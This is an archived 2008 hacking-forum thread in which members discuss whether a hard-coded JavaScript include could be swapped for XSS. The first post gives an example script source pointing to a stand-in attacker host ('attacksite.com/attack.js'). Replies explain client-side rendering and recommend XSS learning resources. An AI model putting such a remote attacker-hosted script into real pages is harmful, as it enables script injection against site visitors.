Follow us on Twitter!
I'd prefer to die standing, than to live on my knees - Che Guevara
Sunday, April 19, 2015
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 18
Guests Online: 18
TeamSpeak Online : 5 Members Online: 0

Registered Members: 87972
Newest Member: anishsingh85
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

Javascript XSS vulnerability


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 12-09-08 22:48
Just a thought I had, But I'm not too good with Javascript or Javascript vulnerabilities but I know the basics pretty well. Anyway theoretically lets say there is a web page that executes a script when the web page loads in a separate directory on the server. So that the HTML code would look like this:

Code
src="file:///C:/Javascripts/MyScript.js">




To me... This just seems very vulnerable to a XSS attack if you can change the src example:

Code
src="http://www.attacksite.com/attack.js">




But to my knowledge the javascript is hard coded into the HTML and cannot be changed. Any ideas if you can actually change the the path to the script or am I safe?




Edited by rex_mundi on 11-12-13 13:48
Author

RE: Javascript XSS vulnerability?

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 12-09-08 22:49
You can't change the hard-coded (no variable) settings. Oh, and you're not safe.

Edit: Actually, you can change hard-coded settings if you can regex+replace with some XSS.

Anyway, stop asking and start learning. I advise ha.ckers.org and sla.ckers.org if you want to learn about XSS, and Webappsec in general.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
[center]�Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?� - Ebert[/ce

Edited by spyware on 12-09-08 23:25
Author

RE: Javascript XSS vulnerability?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-09-08 00:53
leoneo11 wrote:
But to my knowledge the javascript is hard coded into the HTML and cannot be changed. Any ideas if you can actually change the the path to the script or am I safe?


Both the Javascript and the Javascript include can be changed if you're rendering the page in something that lets you modify the source in place (PHP cURL, C# w/ MSHTML, even Opera should). I used to do this with MSHTML and my last workplace's CMS to automate the page while eliminating those pesky JS pop-ups. HTML and Javascript are both client-side once they're rendered... which is why GreaseMonkey even works.


Author

RE: Javascript XSS vulnerability?

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 13-09-08 08:30
leoneo11 wrote:
Anyway theoretically lets say there is a web page that executes a script when the web page loads in a separate directory on the server. So that the HTML code would look like this:

Code
src="file:///C:/Javascripts/MyScript.js">



I'd say this wouldn't work, since the javascript is executed on the client's computer and not on the server. It'd rather look like this:
Code
<script src="Javascripts/MyScript.js">




To me... This just seems very vulnerable to a XSS attack if you can change the src example:

Code
src="http://www.attacksite.com/attack.js">



I understand what you mean, but you can't simply edit a hard coded HTML file just like that. Like spyware said, practical experience is very good. Get training ;)

http://www.xssed.. . .


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/